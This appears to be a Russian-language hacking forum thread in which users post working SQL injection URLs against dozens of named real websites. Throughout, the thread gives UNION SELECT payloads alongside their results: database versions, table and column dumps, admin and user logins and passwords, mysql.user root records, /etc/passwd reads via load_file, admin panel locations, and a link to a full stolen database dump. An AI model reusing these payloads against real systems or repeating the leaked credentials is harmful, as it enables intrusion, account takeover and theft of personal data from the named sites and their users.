31:--16:ssn
31:--17:years
31:--18:verification
31:--19:registered
31:--20:lastvisit
31:--21:ip
31:--22:approved
31:--23:payout

Все 4 мускул

http://www.ihrc.org.uk/show.php?id=-1/**/union/**/select/**/1,2,3,4,user(),version(),database(),8,9,10,11,12,1 3/*

http://www.collegedrunkfest.com/sex.php?id=-1/**/union/**/select/**/1,2,concat(database(),char(1),user(),char(1),versi on()),4,5/*

UPD для тех, кому совсем занятся нечем))

## 5:
http://www.thesideproject.net/detail.php?show=-1/**/union/**/select/**/1,2,table_name,4,5,6,7,8/**/from/**/information_schema.tables/**/limit/**/17,1/*

## 4:
http://www.maritime-elbe.de/schatzsuche/detail.php?show=-1/**/union/**/select/**/version(),1/*

Чето непонятное, но домен прикольный))
http://www.etc.ie/products/list.php?cat=-1/**/union/**/select/**/5/*

http://www.firstascent.co.za/news.php?id=-272+union+select+1,2,convert(concat_ws(0x3a,passwo rd,id,firstname,surname,email),binary),4,5,6,7,8,9 ,0,1,2,3+from+users/*
firstascent_admin:fa231

http://www.glenfair.co.za/index.php?page=info&Info=-25+union+select+1,2,convert(concat(user,0x3a,passw ord,0x3a,host),binary),4,5,6,7,8,9,0,1,2+from+mysq l.user+limit+2,1/*
024a8025373efed5:misty01

http://www.widnet.org.zm/news.php?id=-32+union+select+1,2,3,4,5,6,concat(username,0x3a,p assword,0x3a,email),8,9,0,1,2,3,4,5,6,7+from+cmsUs ers+limit+0,1/*
http://www.widnet.org.zm/admin.php
richard@rwatt.co.uk:iamhappy

http://mymovies.ws/movies.php?mode=details&id=-5222+union+select+1,concat_ws(0x3a,id,username,pas sword),3,4,5,6,7,8,9,0,1,2,3,4+from+admin_login+li mit+0,1/*
http://mymovies.ws/admin
jshnew:help@me!

PR-5

http://www.armorysquareofsyracuse.com/main/shopping.php?id=-44+UNION+SELECT+1,CONCAT_WS(0x3A3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26/*


17:authentication
17:--1:user_id
17:--2:user_name
17:--3:user_pass
18:events
18:--1:event_id
18:--2:sort_order
18:--3:event
18:--4:date
18:--5:location
18:--6:admission
18:--7:info
19:hc_admin
19:--1:PkID
19:--2:FirstName
19:--3:LastName
19:--4:Email
19:--5:Passwrd
19:--6:IsActive
19:--7:LoginCnt
19:--8:LastLogin
19:--9:SuperAdmin
19:--10:ShowInstructions
19:--11:PCKey
20:hc_adminloginhistory
20:--1:PkID
20:--2:AdminID
20:--3:IP
20:--4:Client
20:--5:LoginTime
21:hc_adminpermissions
21:--1:PkID
21:--2:EventEdit
21:--3:EventPending
21:--4:EventCategory
21:--5:UserEdit
21:--6:AdminEdit
21:--7:Newsletter
21:--8:Settings
21:--9:Tools
21:--10:Reports
21:--11:AdminID
21:--12:IsActive
22:hc_categories
22:--1:PkID
22:--2:CategoryName
22:--3:ParentID
22:--4:IsActive
22:--5:Path
22:--6:Level
23:hc_eventcategories
23:--1:EventID
23:--2:CategoryID
24:hc_eventnetwork
24:--1:EventID
24:--2:NetworkID
24:--3:NetworkType
24:--4:IsActive
25:hc_events
25:--1:PkID
25:--2:Title
25:--3:LocationName
25:--4:LocationAddress
25:--5:LocationAddress2
25:--6:LocationCity
25:--7:LocationState
25:--8:LocationZip
25:--9:Description
25:--10:StartDate
25:--11:StartTime
25:--12:TBD
25:--13:EndTime
25:--14:ContactName
25:--15:ContactEmail
25:--16:ContactPhone
25:--17:IsActive
25:--18:IsApproved
25:--19:IsBillboard
25:--20:SeriesID
25:--21:SubmittedByName
25:--22:SubmittedByEmail
25:--23:SubmittedAt
25:--24:AlertSent
25:--25:ContactURL
25:--26:AllowRegister
25:--27:SpacesAvailable
25:--28:PublishDate
25:--29:Views
25:--30:Message
25:--31:Directions
25:--32:Downloads
25:--33:EmailToFriend
25:--34:URLClicks
25:--35:MViews
25:--36:LocID
25:--37:Cost
25:--38:LocCountry
26:hc_locationnetwork
26:--1:LocationID
26:--2:NetworkID
26:--3:NetworkType
26:--4:IsActive
27:hc_locations
27:--1:PkID
27:--2:Name
27:--3:Address
27:--4:Address2
27:--5:City
27:--6:State
27:--7:Country
27:--8:Zip
27:--9:URL
27:--10:Phone
27:--11:Email
27:--12:Descript
27:--13:IsPublic
27:--14:IsActive
27:--15:URLClicks
27:--16:Lat
27:--17:Lon
28:hc_newsletters
28:--1:PkID
28:--2:TemplateName
28:--3:TemplateSource
28:--4:IsActive
29:hc_registrants
29:--1:PkID
29:--2:Name
29:--3:Email
29:--4:Phone
29:--5:Address
29:--6:Address2
29:--7:City
29:--8:State
29:--9:Zip
29:--10:EventID
29:--11:IsActive
29:--12:RegisteredAt
30:hc_sendtofriend
30:--1:PkID
30:--2:MyName
30:--3:MyEmail
30:--4:RecipientName
30:--5:RecipientEmail
30:--6:Message
30:--7:EventID
30:--8:IPAddress
30:--9:SendDate
31:hc_settings
31:--1:PkID
31:--2:SettingValue
32:hc_usercategories
32:--1:UserID
32:--2:CategoryID
33:hc_users
33:--1:PkID
33:--2:FirstName
33:--3:LastName
33:--4:Email
33:--5:OccupationID
33:--6:Zip
33:--7:IsRegistered
33:--8:GUID
33:--9:AddedBy
33:--10:RegisteredAt
33:--11:RegisterIP
33:--12:BirthYear
33:--13:Gender
33:--14:Referral
34:members
34:--1:member_id
34:--2:name
34:--3:short_name
34:--4:contact_name
34:--5:contact_title
34:--6:email
34:--7:web
34:--8:contact_address_1
34:--9:contact_address_2
34:--10:address_1
34:--11:address_2
34:--12:phone
34:--13:phone_2
34:--14:phone_2_label
34:--15:fax
34:--16:shopping
34:--17:dining
34:--18:personal
34:--19:entertainment
34:--20:nightlife
34:--21:live
34:--22:work
34:--23:description
34:--24:hours
34:--25:logo
34:--26:pic
35:news
35:--1:news_id
35:--2:sort_order
35:--3:headline
35:--4:date
35:--5:details

http://www.jgkdo.org/hp/show_jg.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,co ncat_ws(0x3a,name,password),11,12+FROM+user+LIMIT+ 1,1/*

Exozist:1688bc1a2663b585f4d0f7ba92f4ceb9: cracked by Ymrs: sb34ak20

adminka: jgkdo.org/hp/opz_login.htm

Ну, товарищи....покажем немцам..

Splitreason.com - PR 5
http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,table_name,5,6,7,8,9,10,11, 12,13,14,15+from+information_schema.tables+limit+1 01,1/*

Splitreason.com - PR 5


Немогу достать админа..)

Колонки
http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,COLUMN_NAME,5,6,7,8,9,10,11 ,12,13,14,15+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE +TABLE_NAME=0x5553455253+limit+0,100/*

Юзер/пасс
http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,concat(USERNAME,char(58),PA SSWORD),5,6,7,8,9,10,11,12,13,14,15+from+users+lim it+1,100/*

Make fun!

______________
159932, ты опоздал на 3 минуты))

Splitreason.com - PR 5


Немогу достать админа..)
http://www.splitreason.com/productdetail.php?id=-508+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user _id,user_type_id,username,password,credit,point_to tal),9,10,11,12,13,14,15+from+users+limit+39111,1/*
~39к юзверей

http://alex.state.al.us/lesson_view.php?id=-1961+union+select+concat(user,0x3a,password,0x3a,h ost)+from+mysql.user+limit+1,1/*
root:6268a4a308ce2246:alex3.asc.edu:Monday1
test:2e8ff8cf35525756:nagios.asc.edu
root:6268a4a308ce2246:%Monday1
test:2e8ff8cf35525756:intranet.asc.edu
root:6268a4a308ce2246:129.66.12.21:Monday1
phpesp:6268a4a308ce2246:alex.asc.edu:Monday1

http://alex.state.al.us/admin/contextAdmin/contextAdmin.jsp?submit=Add+Context&addContextPath=&addContextDocBase=&removeContextName=

http://alex.state.al.us/lesson_view.php?id=-1961+union+select+concat_ws(0x3a,user_name,passwor d)+from+user+limit+16111,1/*
16к юзеров

http://alex.state.al.us/phpinfo.php

================================================
http://www.onradio.gr/LoadMedia.php?id=-372+union+select+1,concat_ws(0x3a,user,pass),3,4,5 ,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+member s+limit+0,1
http://www.onradio.gr/admin/index.php
george:stelios
есть cpanel - но не грузит ((
https://onradio.gr:2083/

================================================
http://www.popart.gr/news_alone.php?id=-19+union+select+1,password,username,4,5,6,7,8+from +users+limit+0,1/*
vm_admin:686c821a80914aef822465b48019cd34:vm

http://www.aclosport.nl/index.php?s=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10

http://sportdreams.nl/news.php?lang=uk&template=news&id=-1+UNION+SELECT+1,2,3,4

http://www.nationmultimedia.com/breakingnews/read.php?newsid=-1+union+select+1,2,3,4,5,6,7,8,9,10

http://www.guitarnoise.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

http://viet.vietnamembassy.us/tintuc/story.php?d=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*

http://www.ramld.ru/books/book.php?id=-1+union+select+1,2,3,4,5,6,7,8/*

http://www.tokiavto.ru/pages.php?id=-1+union+select+1,2,3

:)

Ляпис Трубецкой рулит))

http://www.lyapis.com/anons.php?id=-1+union+select+1,user,3,4,5/*

Database Version: 4.1.22-standard
Database name: lyapis_lyapis
User name: lyapis_lyapis@localhost

Сегодня на нашем операционном столе сайт alfavideo.ru от группы компаний альфа арсенал, системы безопасности, аж самому смешно, хорошая у них безопасность)))).

Приступим:

Имена таблиц
http://www.alfavideo.ru/services?pg=-9+union+select+1,TABLE_NAME+FROM+INFORMATION_SCHEM A.TABLES+limit+27,1/*

Колонки в таблице tbl_m_user
http://www.alfavideo.ru/services?pg=-9+union+select+1,COLUMN_NAME+FROM+INFORMATION_SCHE MA.COLUMNS+WHERE+TABLE_NAME=0x74626C5F6D5F75736572 +limit+1,1/*

Получаем всю инфу по админам
http://www.alfavideo.ru/services?pg=-9+union+select+1,concat(login,char(58),pass,char(5 8),email,char(58),r_name,char(58),phone,char(58),g roup_id,char(58),deleted)+FROM+tbl_m_user+limit+0, 1/*

Собстно логин и пасс 3х админчигов, которые были получены.

Steel:k15Xsp3
pro:k15Xsp3
Topotun:k15Xsp3


И админка: http://www.alfavideo.ru/admin/

Make fun!

pr 3
http://www.crimelab.nl/csi.php?series=6666+union+select+111,version(),333 ,444,555,666,777,888,999,110,111,112,113,114,115,1 16,117,118,119,220,221,2221/*&page=index2
5.0.32-Debian_7etch5-log::crimelab@localhost::crimelab

Присутствует раскрытие путей: /home/aidoann/crimelab/welcome.html


albums.cpg11d_users (http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+25,1/*&page=index2)
user_id,user_name,user_password,user_email
1 запись(liberque:::78ArK71)


albums.cpg1_users http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+38,1/*&page=index2)
user_id,user_name,user_password,user_email
две записи (admin:::78ArK71 и liberque:::78ArK71:::liberque@liberque.nl)

inches.phpbb_users (http://www.crimelab.nl/csi.php?series=6666+union+select+1,concat_ws(0x2e, table_schema,table_name),3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,21+from+information_schem a.tables+limit+97,1/*&page=index2)
user_id,username,user_password,user_email
здесь 149 записей


есть так же файл прив:
http://www.crimelab.nl/csi.php?series=6666+union+select+1,load_file(0x2f6 574632f706173737764),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,21/*&page=index2

Наслаждайтесь

Поддержим лоад_филе
http://www.747.ru/board/main/show/?id=-9999+union+select+1,2,3,load_file(0x2f6574632f7061 73737764),5,6,7,8,9,10/*
Red_Red1 спс.

PR 7
http://www.lib.umich.edu/grad/guide/guide.php?id=-4+union+select+1,2,concat_ws(char(58),id,name,uniq name,email),4,5,null,null,8,9+from+selector/*
PR 5
http://www.expressionindesign.com/post.php?id=29'+union+select+1,2,concat_ws(0x3a3a, version(),user(),database()),4,5,6,7,8,9,10,11,12, 13,14/*
version():5.0.27-standard-log
user():expressionin@76.12.19.204
database():expressionin

Есть раскрытие путей:
/vservers/expressionin/htdocs/
Есть интересная табличка:

Expressionin.users
--id,username,password,email

PR 4
http://www.mallenbaker.net/blog/post.php?id=-63+union+select+unhex(hex(concat_ws(0x3a3a,version (),user(),database()))),2,3/*version():4.1.11-Debian_4sarge8-log
user():mallen@localhost
database():mallen

PR 3
http://www.hornets247.com/post.php?id=-55+union+select+1,2,concat(version(),0x3a3a,user() ,0x3a3a,database()),4,5/*version():4.0.27-max-log
user():hornets247_v4_0@linhost194.prod.mesa1.secur eserver.net
database():hornets247_v4_0

PR 3
http://blog.pmaster.net/post.php?id=-380+union+select+1,concat(version(),0x3a3a,user(), 0x3a3a,database()),null,null,null,null,null,null,n ull,null,11/*version():4.1.22-log
user():pmaste_blog@localhost
database():pmaste_pmblog

Есть раскрытие путей:
/home/pmaste/public_html/blog/post.php
PR 3
http://www.elgranpoder.com/html/post.php?id=-165+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),user(),database()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24/*version():[b]5.0.45-log
user():myelgranpode@localhost
database():wp3

PR 3
http://www.r31-rabota.ru/post.php?id=4481+union+select+1,concat_ws(0x3a3a,v ersion(),user(),database()),3,4,5,6,7,8,9,10,null, null,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41/*version():4.1.21-standard-log
user():pro_rabot@localhost
database():pro_r31rabota

PR 1
http://www.leoq2.com/board/post.php?id=-732+union+select+1,2,3,4,5,null,concat_ws(0x3a3a,v ersion(),user(),database()),8,9/*version():5.0.24alyceu
user():leoq2_com@eu1349f.lyceu.net
database():leoq2_com_1

PR N/A
http://caxton.emich.edu/guide/guide.php?id=-237+union+select+1,2,concat_ws(char(58),id,name,un iqname,email),4,5,null,null,8,9+from+selector/*
PR N/A
http://www.ieei.pt/programas/post.php?id=38+union+select+concat_ws(0x3a3a,versi on(),user(),database()),2,3/*version():4.0.26
user():ieeiuse_web@216.81.72.128
database():ieeiuse_db

Бага

http://tid.odessa.ua/news/?newsid=-513+union+select+1,2,3,4,5/*

Глянем имя БД
http://tid.odessa.ua/news/?newsid=-513+union+select+concat_ws(0x3a3a,version(),user() ,database()),2,3,4,5/*

Облом... а если так??? :)

http://tid.odessa.ua/news/?newsid=-513+union+select+aes_decrypt(aes_encrypt(concat_ws (0x3a3a,version(),user(),database()),0x71),0x71),2 ,3,4,5/*

4.1.11-Debian_4sarge8-log::newtid@localhost::newtid

Бага
http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0&idn=-1213960526+union+select+1,2,3,4,5

http://odessa.tv/news_music_full.php?ns=&lim=&no_active=&str_off=0&idn=-1213960526+union+select+1,2,3,concat_ws(0x3a3a,ver sion(),user(),database()),5

5.0.45-Debian_1ubuntu3.3-log::rus1@10.0.0.46::news_music

Если чесно х3 откуда в линках пробелы побрались, их небыло!!!!! Поубирать не забудьте.

http://tid.odessa.ua/news/?newsid=-513+union+select+aes_decrypt(aes_encrypt(concat_ws (0x3a3a,version(),user(),database()),0x71),0x71),2 ,3,4,5/*
намного удобнее если использовать конструкцию unhex(hex())
например так:
http://tid.odessa.ua/news/?newsid=-513+union+select+unhex(hex(concat_ws (0x3a3a,version(),user(),database()))),2 ,3,4,5/*

Лайт https://www.sclan.info/showthread.php?t=1295 ....Блин хацкер крутой, увидел статью и скуль выложил тут(небось чтоб репу подняли лол)
З.Ы.Делаем выводы!Сорри пожалуйста за оффтоп!

Лайт https://www.sclan.info/showthread.php?t=1295 ....Блин хацкер крутой, увидел статью и скуль выложил тут(небось чтоб репу подняли лол)
З.Ы.Делаем выводы!Сорри пожалуйста за оффтоп!
Прости, но я там на зареген. Нашел скуль сам, если не веришь, почитай предыдущие мои посты по скулям, или ты думаешь что я настолько тупой и их тоже скопипастил?
Этот сайт одна сплошная дырень, помимо моего шелла, там было еще 2, если быть точнее, то я раскрутил скуль 17/06/2008, а выложил только щас.
Так что сам делай выводы.

ЗЫ И уж кому, так точно не тебе меня учить, на себя лучше посмотри.

ЗЗЫ Вот ты и спалился, я ждал когда ты появишся, тебе привет от 26, я думаю ты сразу поймешь о ком я, чето вы долго сайт свой поднимали...

Если бы не 26 тогда тебе сказал про дыру, хер бы ты написал ту статью, я почему-то свой код запроса там узнаю. Я делал, отталкиваясь от этой статьи: https://forum.antichat.ru/thread43966.html, а вот тебе инфу слили...

xxx (18:17:43 17/06/2008)
data.php - твоё?
xxx (18:17:45 17/06/2008)
в папке
Лайт (18:18:01 17/06/2008)
нет
xxx (18:18:38 17/06/2008)
ипать
xxx (18:18:42 17/06/2008)
уже до нас кто-то залил
xxx (18:18:48 17/06/2008)
http://www.alfavideo.ru/img/data.php
Лайт (18:18:49 17/06/2008)
шелл?
xxx (18:18:51 17/06/2008)
гыыы
xxx (18:18:53 17/06/2008)
да
Лайт (18:18:58 17/06/2008)
ахахахаха
Лайт (18:19:00 17/06/2008)
ГЫЫЫЫ
xxx (18:19:05 17/06/2008)
ну судя по версии шелла, это был новичёк

PS А вот и дамп ВСЕЙ базы, качайте на здоровье! http://ifolder.ru/7090064
Дату создания файла только гляньте...
Ты не на того наехал олень.

http://easynotebook.890m.com/notelist.php?exid=2785J&n=15)%20UNION%20SELECT%201,database(),3,4,5,versio n(),7/*
4.1.22-standard
(хотя ничего полезного там нету к сожалению)

слепая:
http://procreditbank.com.ua/?cat=130&num=220&news=3467%20AND%201=2
MYSQL 4.0.27-standard
база mfb
юзер mfb@rex.kiev.sovam.com

понаходил скули...
http://www.elson.ru/cgi-bin/dsp.pl?mode=add_to_basket&goods_id=999999+union+select+1/*
http://www.hitech-online.ru/boards/pc/weblinks.html?start=9999+union+select+1/*
http://www.rusrek.com/ru/weather/?login=1'+union+select+1/*&password=default
http://www.knife.ru/index.php?1=1&do=list&treeid=9999999+union+select+1/*
http://www.abcinfo.ru/index.php?l=99999+union+select+1/*
http://salonkrasotka.ru/catalog2.php?customerid=9999999+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2/*
http://www.child-toys.ru/view_catalog.php?mtypeid=-1+union+select+1,version(),3,4,5/*
http://www.l-gifts.ru/view_catalog.php?type_low=-1+union+select+version(),2/*

http://www.ab-tuning.ru/view_catalog.php?code=1'
http://www.ceramicgroup.ru/view_catalog.php?razdel=-1
http://www.whitegoods.ru/selection/?cID=175&min_price=%D0%BE%D1%82&max_price=%D0%B4%D0%BE&boxes[aad]=310&boxes[absolut]=99999)+union+select+1,2,3,4,5
,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
некоторые непохек..) разкручивайте кто может.. и сюда..)

_____________________________________________
где же моя подпись?

Продолжим тему авиа**** и лоад_филе:

http://www.aviaport.ru/directory/publishers/?id=-21+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,load_file(0x2f6574 632f706173737764),27,28,29,30/*

Версион, юзер, датабэйс через cast(version()/**/AS/**/binary)

http://www.rotawheels.com/news.php?id=-3+union+select+1,user(),version(),database(),5/*
4.1.20-log 339068_rota@172.16.10.83 339068_rotanews

http://www.phpbuddy.com/article.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4,5,6
4.1.21-standard:phpbud22_phpbudd@localhost:phpbud22_phpbu ddy

Крупный игровой портал : apollo.lv

http://cs.apollo.lv/stats/weapon.php?id=20+limit+0+union+select+1,TABLE_NAME ,3,4,5,6,7,8,9,10,11,12,13,TABLE_SCHEMA,15,16,17,1 8,19+from+information_schema.columns/*

PR 5
http://www.nashuapride.com/events/event_info.php?eventid=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9/*
4.1.20::pride06@localhost::pride

PR 4
http://www.thegenesisgroup.org/calendar/event_info.php?eventid=-16+union+select+1,2,unhex(hex(concat_ws(0x3a3a,ver sion(),user(),database()))),4,null,6,7/*
4.1.12::root@localhost::genesis_grou
рутовая запись.. finish him!!!

PR 4
http://www.flaglercounty.org/garbage/pages.php?PID=-999951+union+select+1,2,3,4,concat_ws(0x3a3a,versi on(),user(),database()),null,7,8/*
5.0.22-community-nt::root@psn.flaglercounty.org::flaglercounty_org
рутовая запись... Finish him!!!

PR 4
http://www.moeck.com/pages.php?pid=-800+union+select+1,2,concat_ws(0x3a3a,version(),us er(),database()),null,5,6,7/*
4.0.27-max-log::dbo145510923@212.227.127.166::db145510923
file_priv нету

PR 3
http://www.esateys.com/pages.php?pID=-80+union+select+1,2,3,4,5,concat(version(),0x3a3a, user(),0x3a3a,database()),7,8,9,10/*
4.1.22-max-log::eCart@linhostssl06.prod.mesa1.secureserver.ne t::eCart
file_priv нет

PR 3
http://fmccrustel.ru/pages.php?pid=-18+union+select+1,concat(version(),0x3a3a,user(),0 x3a3a,database()),3,4/*
5.0.45-log::fmccel@localhost::fmccel
file_priv нет, в базе ничего интересного нету

PR 2
http://www.psplaw.co.uk/preview/pages.php?pid=-2+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3/*
4.1.22-standard::powellsp_user@localhost::powellsp_data
file_priv нету

gisTy И так .. начнём ! :cool:
http://www.flaglercounty.org/garbage/pages.php?PID=-999951+union+select+1,2,3,4,concat_ws(0x3a,usernam e,password),null,7,8+from+fc_current.adminlogin/*
webmaster:taterdome
http://www.flaglercounty.org/garbage/pages.php?PID=-999951+union+select+1,2,3,4,concat_ws(0x3a,usernam e,password),null,7,8+from+ffr_cal.ltw_usersv4/*
Webmaster:RbgJxoUvwG7qk
http://www.flaglercounty.org/garbage/pages.php?PID=-999951+union+select+1,2,3,4,concat_ws(0x3a,usernam e,password),null,7,8+from+ffr_ashnews.ashprojects_ users/*
steve;peanut
================================================== ===
http://www.thegenesisgroup.org/calendar/event_info.php?eventid=-16+union+select+1,2,convert(concat_ws(0x3a,user,pa ssword,host),binary),4,null,6,7+from+mysql.user/*
доступ рутовый без пароля .. но только с локалхоста и прилогоющих :(

http://www.rozymnuk.com.ua/?chek=listgoods&id_categories=165'

http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),0x3a,us er(),0x3a,version()),3/*

Помогите раскрутить доконца :D

globalwaterfoundation_org_-_1
globalwater@web2.4what.net
5.0.37-community-log

http://www.ewb-usa.org/news.php?ID=-1+order+by+1/*

http://www.english-zone.com/index.php?ID=-1'

http://musicsclub.com/index.php?id=-1+union+select+1,2,3,4/*

http://www.velostyle.com.ua/index.php?id=-1'

http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),0x3a,us er(),0x3a,version()),3/*

Помогите раскрутить доконца :D

globalwaterfoundation_org_-_1
globalwater@web2.4what.net
5.0.37-community-log
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,user_username,user _password),3+from+wma_users+limit+0,1/*
4what:4what

http://www.ontariohockeyleague.com/events/pop.php?id=99999+union+select+1,2,3,VERSION(),5,6, 7,8/*
version: 5.0.22-log
user: newsport@node1.leaguestat.com
database: ohl
=============================================
http://www.omn.ru/news_text.php?id=99999+union+select+1,2,3,version( ),5,6,7,8/*
version: 4.0.27-log
user: modest_hash@zvm7.host.ru
database: modest?hash
=============================================
http://www.world-challenge.com/news/story.php?ID=99999+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,version(),16,17/*
version: 4.0.27-nt-log
user: sccawc@phoebe.dvti.com
database: worldchallenge
=============================================

для cash$$$
http://www.world-challenge.com/news/story.php?ID=99999+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,concat_ws(0x3a,username,password),1 6,17+from+users/*
jsteflik:06redfp1
http://www.world-challenge.com/news/story.php?ID=99999+union+select+1,2,3,4,5,6,7,8,9, 10,11,12,13,14,concat_ws(0x3a,admin,admin_pw),16,1 7+from+phpads_config/*
adserver:75936c960fc65ef83ee6b54ecd7d3c05:roadrace

PR 4
http://www.brainteasercentral.com/riddle.php?riddleid=-1+union+select+concat_ws(0x3a3a,version(),user(),d atabase()),2,3,4,5,6,7,8/*
version(): 4.1.22
user(): braintea_btuser@localhost
database(): braintea_btcom

PR 3
http://logica.online-gratuite.ro/riddle.php?riddleid=-133+union+select+concat_ws(0x3a3a3a,version(),user (),database()),null,null,4,5,6,null/*&status=a
Version(): 4.1.22-standard
User(): jocuriha_stefan@localhost
Database(): jocuriha_stefan@localhost


PR 3
http://www.allriddles.com/riddle.php?riddleid=-211+union+select+concat_ws(0x3a3a3a,version(),user (),database()),2,3,4,5,6,7/*
Version(): 4.1.22-standard
User(): allriddl_allridd@localhost
Database(): allriddl_allriddles

Pr6:
mel.org
http://mel.org/SPT--BrowseResources.php?ParentId=748+union+select+111, 222,333,444,555,user(),777,888,999--
www.grow.arizona.edu
http://www.grow.arizona.edu/SPT--BrowseResources.php?ParentId=291+union+select+1,2, 3,4,5,user(),7,8,9--

www.wildscreenfestival.org
http://www.wildscreenfestival.org/index.php?pageid=-303+union+select+1,2,3,concat(username,0x3a,user_p assword),user(),6,7+from+phpbb_users--&parentid=257
http://www.wildscreenfestival.org/index.php?pageid=-303+union+select+1,2,3,concat(table_schema,0x3a,ta ble_name,0x3a,column_name),5,6,7+from+information_ schema.columns--&parentid=257


Pr5:
www.festivalofnature.org
http://www.festivalofnature.org/festival.php?pageid=-3+union+select+1,2,3,4,concat(table_schema,0x3a,ta ble_name,0x3a,column_name,0x3c62722f3e),6,7+from+i nformation_schema.columns--&parentid=0

www.zonemedical.com.au

http://www.zonemedical.com.au/product_details.php?pid=-121+UNION+SELECT+1,2,CONCAT_WS(0x3A3a,username,pas sword),4,5,6,7,8+FROM+users+limit+0,1/*

5.0.45-community


18:brands
18:--1:id
18:--2:name
19:categories
19:--1:id
19:--2:name
20:file_types
20:--1:id
20:--2:name
21:files
21:--1:id
21:--2:file_type_id
21:--3:file_name
21:--4:file_size
21:--5:file_description
21:--6:product_id
21:--7:category_id
21:--8:primary_photo
21:--9:user_type_0
21:--10:user_type_2
21:--11:user_type_3
21:--12:user_type_4
22:products
22:--1:id
22:--2:category_id
22:--3:brand_id
22:--4:name
22:--5:product_code
22:--6:description
22:--7:serial_no_format
22:--8:active
22:--9:cashback
23:sections
23:--1:id
23:--2:name
23:--3:content
23:--4:width
24:users
24:--1:id
24:--2:user_type_id
24:--3:username
24:--4:password
24:--5:description

Логинимся с главной под админом:
zonemedical:zone001

4.1.20-standard-log
caffetime_ro_caffe
caffetime@localhost

http://www.caffetime.ro/news.php?id=-1+union+select+1,database(),user(),version()/*

zione_evoluzione | 5.0.45-community

zione_titziano@localhost

http://www.evoluzione.ro/news.php?id=-1+union+select+1,2,database(),user(),5,6,version()/*

http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database())/*
user()=companyh@localhost:
version()=4.1.20

http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat(user(),0x3a,version(), 0x3a,database())/*
user()=companyh@localhost:
version()=4.1.20
http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat_ws(0x3a,username,user_ password)+from+phpbb_users/*
administrator:323102a7843e63c39be43e743c20be6a:jup 1ter
http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,password+from+users/*
http://www.companyhealth.co.uk/display.php?pageid=-2+union+select+1,2,3,concat(user,0x3a,password)+fr om+login/*
admin:health14

http://www.snseurope.com/snslink/news/generalnews-full.php?newsid=-1+union+select+1,2,3,4,concat_ws(0x20,version(),us er(),database()),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20/*

Очень повезло... Версия 4 но имена столбцов и таблиц стандартные =) username password FROM users

http://www.snseurope.com/snslink/news/generalnews-full.php?newsid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+fr om+users/*

:D

http://82.146.59.108/bonapart/plots/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*

http://www.soyata.com/Shop/ViewItem.cfm?&ID=1112'

hack countinue :)

4-я версия, но стоблцы стандартные
http://www.mantoncommunityalliance.org.uk/news/details.php?id=28'+union+select+concat_ws(0x3a,pas sword,email,username)+from+users+limit+0,1/*

ну и как обчно админка тоже стандартная:
http://www.mantoncommunityalliance.org.uk/admin/

есть возможность заливать файлы (ява скрипт отрубаете, и заливаете любые файлы - не только jpg,gif,png) единственное что не нашел-дира куда заливается темповый файл

-----------------------
http://www.community.oleary.pe.ca/news.cfm?id=-1+union+select+1,username,password,4+from+users

login/pass в открытом виде:
bshaw
o859leary

вот и админка:
http://www.community.oleary.pe.ca/admin/
------------------------
http://www.suncal.com/community/?id=1+and+1=2+union+select+1,2,table_name,4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19+from+information _schema.tables+limit+58,1/*

5.0.45-community-nt
suncalc_edit@localhost

админка по стандарту, логин и пасс админа смотреть не стал - пошел спать

mtv.se
http://www.mtv.se/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845

mtve.com
http://www.mtve.com/common/mediaplayer/playMedia_big2.php?TrackId=99999+union+select+1111 ,concat_ws(0x3a,version(),user(),database()),3333, 4444/*&ArticleId=4845

mtv.no
